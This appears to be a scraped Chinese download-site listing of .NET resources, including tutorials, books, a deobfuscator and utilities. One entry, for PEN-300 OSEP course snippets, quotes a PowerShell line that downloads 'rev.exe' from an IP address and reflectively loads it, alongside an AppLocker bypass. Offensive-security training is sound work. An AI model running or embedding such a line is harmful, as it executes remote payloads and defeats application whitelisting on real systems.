0-关于楼房网:楼房网(louhome.com)是深圳房地产门户网站,中文域名:"房地产信息网.中国"。 1-内容介绍:收录中国姓氏约480个,包括复姓。  2-关于软件:ASP.NET+ACCESS,不需要安装复制即可运行。防止SQL注入设计。 3-关于开源:源码内对可以改写部分做了详细的注解,站长可以根据自己的需要修改源码以满足需求。
2023-01-07 21:57:07 202KB .net源码
1
de4dot-mod-reactor 4.9 神器 De4dot是一款免费、开源的脱壳/反混淆工具,用户可以用它来脱Dotfuscator、MaxToCode处理过的程序,不过需要在命令行下进行操作,有从事软件开发和逆向编程的人员不要错过。
2023-01-07 15:25:23 2.95MB de4dot4.9 C# .NET 反混淆
1
ASP.net: ADO的五大对象: Connection 连接对象 Command 命令对象,指示要执行的命令和存储过程! DataReader是一个向前的只读的数据流。 DataAdapter是功能强大的适配合器,支持增删改查的功能 DataSet是一个数据级对象,相当于内存中的一张表或多张表!(asp中是recordset)
2023-01-06 17:55:25 57KB ado.net的五大对象 ado .net asp
1
经过前一段时间的翻译和编辑,我们陆续发出12篇ASP.NET MVC 5的入门文章。其中大部分翻译自ASP.NET MVC 5 官方教程,由于本系列文章言简意赅,篇幅适中,从一个web网站示例开始讲解,全文最终完成了一个管理影片的小系统,非常适合新手入门ASP.NET MVC 5 (新增、删除、查询、更新) ,并由此开始开发工作。
2023-01-06 13:53:57 4.82MB ASP.NET MVC
1
ExcelCreator5 for .net 帮助文档
2023-01-06 11:07:08 767KB ExcelCreator5 for .net 帮助文档
1
Apress, 2010 ,如何用.net来实现并行计算,本书将带你一探究竟 Parallel programming has been revolutionised in .NET 4 providing, for the first time, a standardised and simplified method for creating robust, scalable and reliable multi-threaded applications. The Parallel Programming features of .NET 4 allow the programmer to create applications that harness the power of multi-core and multi-processor machines. Simpler to use and more powerful than “classic” .NET threads, parallel programming allows the developer to remain focused on the work an application needs to perform. In Pro .NET 4 Parallel Programming in C#, Adam Freeman presents expert advice that guides you through the process of creating concurrent C# applications from the ground up. You’ll be introduced to .NET’s parallel programming features, both old and new, discover the key functionality that has been introduced in .NET 4, and learn how you can take advantage of the power of multi-core and multi-processor machines with ease. Pro .NET 4 Parallel Programming in C# is a reliable companion that will remain with you as you explore the parallel programming universe, elegantly and comprehensively explaining all aspects of parallel programming, guiding you around potential pitfalls and providing clear-cut solutions to the common problems that you will encounter. What you’ll learn * Develop scalable and robust parallel applications in C#. * Design, test and use parallel algorithms and data structures. * Understand and implement common parallel design patterns. * Avoid common anti-patterns and problems. * Use Visual Studio to verify and debug parallel applications. amazon link:http://www.amazon.com/exec/obidos/ASIN/1430229675/buythisbooks-20
2023-01-05 23:25:06 4.63MB .net c# pdf Apress
1
OSEP代码片段代码示例按原样提供,没有任何形式的保证。 基于进攻性安全的PEN-300课程。 OSEP代码段的类和方法代码示例按原样提供,没有任何形式的保证。 基于进攻性安全的PEN-300课程。 类和方法是公共的,因此大多数二进制文件应允许如下所示的反射加载。 $ data =(新对象System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')$ assem = [System.Reflection.Assembly] :: Load($ data)[rev。程序] :: Main(“” .. Split())内容摘录名称说明AppLocker绕过PowerShell Runspace(C#)的基本二进制文件
2023-01-05 19:24:26 76KB .NET Miscellaneous
1
asp.net中绑定TextBox回车事件的解决方法。
2023-01-05 17:44:56 3KB 绑定 回车 textbox C# .net
1
测试pdf转图片无限制,无水印
2023-01-05 01:08:40 13.04MB .net 安全 microsoft
1
内容索引:VC/C++源码,系统相关,目录  vc++.net获取当前运行程序所在的目录,自动查找自身所在的目录路径,枚举并显示出来,虽然是个简单的小例子,的朋友可能对其方方面面还是很陌生,希望通过这些超简单的小例子,有帮助。
2023-01-04 21:21:53 12KB VC/MFC源代码 Windows系统源代码
1